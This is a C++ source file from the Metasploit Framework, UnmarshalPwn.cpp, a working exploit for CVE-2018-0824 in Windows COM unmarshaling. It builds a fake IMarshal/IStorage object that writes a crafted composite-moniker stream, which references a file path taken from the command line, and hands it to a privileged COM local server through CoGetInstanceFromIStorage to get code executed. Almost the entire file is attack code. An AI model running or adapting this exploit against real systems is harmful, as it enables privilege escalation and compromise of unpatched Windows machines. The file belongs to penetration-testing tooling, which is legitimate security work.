rapid7/metasploit-framework

View on GitHub
external/source/exploits/CVE-2018-0824/UnmarshalPwn.cpp

Summary

Maintainability
Test Coverage
// UnmarshalPwn.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdio.h>
#include <tchar.h>
#include <string>
#include <comdef.h>
#include <winternl.h>
#include <ole2.h>
#include <Shlwapi.h>
#include <strsafe.h>
#include <vector>
#include <stdlib.h>

#pragma comment(lib, "shlwapi.lib")

GUID marshalInterceptorGUID = { 0xecabafcb,0x7f19,0x11d2,{ 0x97,0x8e,0x00,0x00,0xf8,0x75,0x7e,0x2a } };
GUID compositeMonikerGUID = { 0x00000309,0x0000,0x0000,{ 0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 } };
UINT header[] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
UINT monikers[] = { 0x02,0x00,0x00,0x00 };
GUID newMonikerGUID = { 0xecabafc6,0x7f19,0x11d2,{ 0x97,0x8e,0x00,0x00,0xf8,0x75,0x7e,0x2a } };
GUID random;
OLECHAR* randomString;

static bstr_t IIDToBSTR(REFIID riid)
{
    LPOLESTR str;
    bstr_t ret = "Unknown";
    if (SUCCEEDED(StringFromIID(riid, &str)))
    {
        ret = str;
        CoTaskMemFree(str);
    }
    return ret;
}

unsigned char const* GuidToByteArray(GUID const& g)
{
    return reinterpret_cast<unsigned char const*>(&g);
}

class FakeObject : public IMarshal, public IStorage
{
    LONG m_lRefCount;
    IStoragePtr _stg;
    wchar_t *pFilePath = NULL;

public:
    //Constructor, Destructor
    FakeObject(IStoragePtr storage, wchar_t *pValue) {
        _stg = storage;
        m_lRefCount = 1;
        pFilePath = pValue;
    }

    ~FakeObject() {};

    //IUnknown
    HRESULT __stdcall QueryInterface(REFIID riid, LPVOID *ppvObj)
    {
        if (riid == __uuidof(IUnknown))
        {
            printf("Query for IUnknown\n");
            *ppvObj = this;
        }
        else if (riid == __uuidof(IStorage))
        {
            printf("Query for IStorage\n");
            *ppvObj = static_cast<IStorage*>(this);
        }
        else if (riid == __uuidof(IMarshal))
        {
            printf("Query for IMarshal\n");
            *ppvObj = static_cast<IMarshal*>(this);
        }
        else
        {
            printf("Unknown IID: %ls %p\n", IIDToBSTR(riid).GetBSTR(), this);
            *ppvObj = NULL;
            return E_NOINTERFACE;
        }

        ((IUnknown*)*ppvObj)->AddRef();
        return NOERROR;
    }

    ULONG __stdcall AddRef()
    {
        return InterlockedIncrement(&m_lRefCount);
    }

    ULONG __stdcall Release()
    {
        ULONG  ulCount = InterlockedDecrement(&m_lRefCount);

        if (0 == ulCount)
        {
            delete this;
        }

        return ulCount;
    }

    virtual HRESULT STDMETHODCALLTYPE CreateStream(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsName,
        /* [in] */ DWORD grfMode,
        /* [in] */ DWORD reserved1,
        /* [in] */ DWORD reserved2,
        /* [out] */ __RPC__deref_out_opt IStream **ppstm) {
        printf("Call: CreateStream\n");
        return _stg->CreateStream(pwcsName, grfMode, reserved1, reserved2, ppstm);

    }

    virtual /* [local] */ HRESULT STDMETHODCALLTYPE OpenStream(
        /* [annotation][string][in] */
        _In_z_  const OLECHAR *pwcsName,
        /* [annotation][unique][in] */
        _Reserved_  void *reserved1,
        /* [in] */ DWORD grfMode,
        /* [in] */ DWORD reserved2,
        /* [annotation][out] */
        _Outptr_  IStream **ppstm) {
        printf("Call: OpenStream\n");
        _stg->OpenStream(pwcsName, reserved1, grfMode, reserved2, ppstm);
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE CreateStorage(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsName,
        /* [in] */ DWORD grfMode,
        /* [in] */ DWORD reserved1,
        /* [in] */ DWORD reserved2,
        /* [out] */ __RPC__deref_out_opt IStorage **ppstg) {
        printf("Call: CreateStorage\n");
        _stg->CreateStorage(pwcsName, grfMode, reserved1, reserved2, ppstg);
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE OpenStorage(
        /* [string][unique][in] */ __RPC__in_opt_string const OLECHAR *pwcsName,
        /* [unique][in] */ __RPC__in_opt IStorage *pstgPriority,
        /* [in] */ DWORD grfMode,
        /* [unique][in] */ __RPC__deref_opt_in_opt SNB snbExclude,
        /* [in] */ DWORD reserved,
        /* [out] */ __RPC__deref_out_opt IStorage **ppstg) {
        printf("Call: OpenStorage\n");
        _stg->OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, ppstg);
        return S_OK;
    }

    virtual /* [local] */ HRESULT STDMETHODCALLTYPE CopyTo(
        /* [in] */ DWORD ciidExclude,
        /* [annotation][size_is][unique][in] */
        _In_reads_opt_(ciidExclude)  const IID *rgiidExclude,
        /* [annotation][unique][in] */
        _In_opt_  SNB snbExclude,
        /* [annotation][unique][in] */
        _In_  IStorage *pstgDest) {
        printf("Call: CopyTo\n");
        _stg->CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest);
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE MoveElementTo(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsName,
        /* [unique][in] */ __RPC__in_opt IStorage *pstgDest,
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsNewName,
        /* [in] */ DWORD grfFlags) {
        printf("Call: MoveElementTo\n");
        _stg->MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags);
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE Commit(
        /* [in] */ DWORD grfCommitFlags) {
        printf("Call: Commit\n");
        _stg->Commit(grfCommitFlags);
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE Revert(void) {
        printf("Call:  Revert\n");
        return S_OK;
    }

    virtual /* [local] */ HRESULT STDMETHODCALLTYPE EnumElements(
        /* [annotation][in] */
        _Reserved_  DWORD reserved1,
        /* [annotation][size_is][unique][in] */
        _Reserved_  void *reserved2,
        /* [annotation][in] */
        _Reserved_  DWORD reserved3,
        /* [annotation][out] */
        _Outptr_  IEnumSTATSTG **ppenum) {
        printf("Call:  EnumElements\n");
        _stg->EnumElements(reserved1, reserved2, reserved3, ppenum);
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE DestroyElement(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsName) {
        printf("Call:  DestroyElement\n");
        _stg->DestroyElement(pwcsName);
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE RenameElement(
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsOldName,
        /* [string][in] */ __RPC__in_string const OLECHAR *pwcsNewName) {
        printf("Call:  RenameElement\n");
        return S_OK;

    };

    virtual HRESULT STDMETHODCALLTYPE SetElementTimes(
        /* [string][unique][in] */ __RPC__in_opt_string const OLECHAR *pwcsName,
        /* [unique][in] */ __RPC__in_opt const FILETIME *pctime,
        /* [unique][in] */ __RPC__in_opt const FILETIME *patime,
        /* [unique][in] */ __RPC__in_opt const FILETIME *pmtime) {
        printf("Call:  SetElementTimes\n");
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE SetClass(
        /* [in] */ __RPC__in REFCLSID clsid) {
        printf("Call:  SetClass\n");
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE SetStateBits(
        /* [in] */ DWORD grfStateBits,
        /* [in] */ DWORD grfMask) {
        printf("Call:  SetStateBits\n");
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE Stat(
        /* [out] */ __RPC__out STATSTG *pstatstg,
        /* [in] */ DWORD grfStatFlag) {
        printf("Call:  Stat\n");
        HRESULT hr = 0;
        size_t len = 0;

        len = wcsnlen_s(randomString, MAX_PATH) + 1;
        PWCHAR s = (PWCHAR)CoTaskMemAlloc(len * sizeof(WCHAR));
        wcscpy_s(s, len, randomString);
        pstatstg[0].pwcsName = s;
        hr = _stg->Stat(pstatstg, grfStatFlag);
        printf("End:  Stat\n");
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][unique][in] */
        _In_opt_  void *pv,
        /* [annotation][in] */
        _In_  DWORD dwDestContext,
        /* [annotation][unique][in] */
        _Reserved_  void *pvDestContext,
        /* [annotation][in] */
        _In_  DWORD mshlflags,
        /* [annotation][out] */
        _Out_  CLSID *pCid)
    {
        printf("Call:  GetUnmarshalClass\n");
        *pCid = marshalInterceptorGUID; // ECABAFCB-7F19-11D2-978E-0000F8757E2A
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][unique][in] */
        _In_opt_  void *pv,
        /* [annotation][in] */
        _In_  DWORD dwDestContext,
        /* [annotation][unique][in] */
        _Reserved_  void *pvDestContext,
        /* [annotation][in] */
        _In_  DWORD mshlflags,
        /* [annotation][out] */
        _Out_  DWORD *pSize)
    {
        printf("Call:  GetMarshalSizeMax\n");
        *pSize = 1024;
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE MarshalInterface(
        /* [annotation][unique][in] */
        _In_  IStream *pStm,
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][unique][in] */
        _In_opt_  void *pv,
        /* [annotation][in] */
        _In_  DWORD dwDestContext,
        /* [annotation][unique][in] */
        _Reserved_  void *pvDestContext,
        /* [annotation][in] */
        _In_  DWORD mshlflags)
    {
        printf("Call:  MarshalInterface\n");
        ULONG written = 0;
        HRESULT hr = 0;
        pStm->Write(header, 12, &written);
        pStm->Write(GuidToByteArray(marshalInterceptorGUID), 16, &written);

        IMonikerPtr fileMoniker;
        IMonikerPtr newMoniker;
        IBindCtxPtr context;

        pStm->Write(monikers, 4, &written);
        pStm->Write(GuidToByteArray(compositeMonikerGUID), 16, &written);
        pStm->Write(monikers, 4, &written);
        hr = CreateBindCtx(0, &context);
        hr = CreateFileMoniker(pFilePath, &fileMoniker);
        hr = CoCreateInstance(newMonikerGUID, NULL, CLSCTX_ALL, IID_IUnknown, (LPVOID*)&newMoniker);
        hr = OleSaveToStream(fileMoniker, pStm);
        hr = OleSaveToStream(newMoniker, pStm);
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(
        /* [annotation][unique][in] */
        _In_  IStream *pStm,
        /* [annotation][in] */
        _In_  REFIID riid,
        /* [annotation][out] */
        _Outptr_  void **ppv)
    {
        printf("Call:  UnmarshalInterface\n");
        return E_NOTIMPL;
    }

    virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(
        /* [annotation][unique][in] */
        _In_  IStream *pStm)
    {
        printf("Call:  ReleaseMarshalData\n");
        return S_OK;
    }

    virtual HRESULT STDMETHODCALLTYPE DisconnectObject(
        /* [annotation][in] */
        _In_  DWORD dwReserved)
    {
        printf("Call: DisconnectObject\n");
        return S_OK;
    }
};

static HRESULT Check(HRESULT hr)
{
    if (FAILED(hr))
    {
        throw _com_error(hr);
    }
    return hr;
}

void Exploit(wchar_t *pValue)
{
    HRESULT hr = 0;
    IStoragePtr storage = nullptr;
    MULTI_QI* qi = new MULTI_QI[1];

    GUID target_GUID = { 0x7d096c5f,0xac08,0x4f1f,{ 0xbe,0xb7,0x5c,0x22,0xc5,0x17,0xce,0x39 } };
    hr = CoCreateGuid(&random);

    StringFromCLSID(random, &randomString);
    StgCreateDocfile(randomString, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &storage);

    IStoragePtr pFake = new FakeObject(storage, pValue);

    qi[0].pIID = &IID_IUnknown;
    qi[0].pItf = NULL;
    qi[0].hr = 0;

    CoGetInstanceFromIStorage(NULL, &target_GUID, NULL, CLSCTX_LOCAL_SERVER, pFake, 1, qi);

}

class CoInit
{
public:
    CoInit()
    {
        Check(CoInitialize(nullptr));
        Check(CoInitializeSecurity(nullptr, -1, nullptr, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, NULL, nullptr));
    }

    ~CoInit()
    {
        CoUninitialize();
    }
};


int wmain(int argc, wchar_t** argv)
{
    try
    {
        CoInit ci;

        Exploit(argv[1]);

    }
    catch (const _com_error& err)
    {
        printf("Error: %ls\n", err.ErrorMessage());
    }

    return 0;
}